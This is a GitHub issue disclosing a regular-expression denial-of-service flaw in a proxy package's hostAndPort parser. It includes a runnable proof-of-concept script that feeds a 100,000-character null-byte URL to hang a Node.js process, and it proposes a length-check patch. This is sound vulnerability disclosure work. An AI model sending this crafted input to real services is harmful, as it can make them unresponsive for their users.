proxy-agents icon indicating copy to clipboard operation
proxy-agents copied to clipboard

ReDoS Vulnerability in https-proxy/lib/util/parse.js

Open ShiyuBanzhou opened this issue 5 months ago • 0 comments

Current behavior

A regular expression in packages/https-proxy/lib/util/parse.js is susceptible to Regular Expression Denial of Service (ReDoS). By providing a specially crafted, very long string as a hostname, it is possible to cause the Node.js process to consume 100% CPU and become unresponsive. This is due to catastrophic backtracking in the vulnerable regular expression.

The vulnerability exists in the hostAndPort function, specifically with the hostAndPortRegex.

Desired behavior

The hostAndPort function should be able to handle malformed or malicious host strings without causing the application to hang, effectively mitigating the Denial of Service vector.

Test code to reproduce

The following Proof of Concept (PoC) demonstrates the vulnerability. Running this script will cause the process to hang indefinitely. The Gist

// PoC for ReDoS in @cypress/https-proxy
// Save this as `poc.js` and run `node poc.js`

const path = require('path');
// Note: Adjust the path to the 'parse.js' file based on your project structure.
// This assumes you are running from the root of a cloned cypress repository.
const parse = require(path.join(process.cwd(), 'packages/https-proxy/lib/util/parse.js'));

console.log('Crafting malicious input...');
// A long string of null bytes in the host section of the URL.
const maliciousUrl = 'http://' + '\u0000'.repeat(100000) + '/\n/\n';
console.log('Malicious URL length:', maliciousUrl.length);

console.log('Calling vulnerable function parse.hostAndPort()...');
console.log('If the script hangs here, the ReDoS is successful.');

// The `url.parse` inside `hostAndPort` will extract the malicious host,
// which is then passed to the vulnerable regex.
parse.hostAndPort(maliciousUrl, {}, 80);

// This line will never be reached.
console.log('This message will not be printed.');

Other

The vulnerable regular expression is:

const hostAndPortRegex = /^([^:]+)(:([0-9]+))?$/;

When the host variable, extracted from the input URL, is a very long string without any colons, the ([^:]+) part of the regex experiences catastrophic backtracking.

Recommendation:

The most robust solution is not to "fix" the regex itself, but to prevent it from processing dangerously long inputs. A simple input validation check on the length of the host before executing the regex is the best practice for mitigating ReDoS.

Here is a suggested diff:

--- a/packages/https-proxy/lib/util/parse.js
+++ b/packages/https-proxy/lib/util/parse.js
@@ -28,6 +28,13 @@
   // does it have a port?
   // pull it out if so
   const { host } = url.parse(urlStr);
+
+  // Add a length limit to the host to prevent ReDoS attacks.
+  // A common limit for URL components like hostname is 2048 or 4096.
+  if (host && host.length > 4096) {
+    return null
+  }
 
   const match = hostAndPortRegex.exec(host);
 

This approach is clean, efficient, and directly addresses the root cause of the performance issue without altering the regex logic.

ShiyuBanzhou avatar Jul 05 '25 03:07 ShiyuBanzhou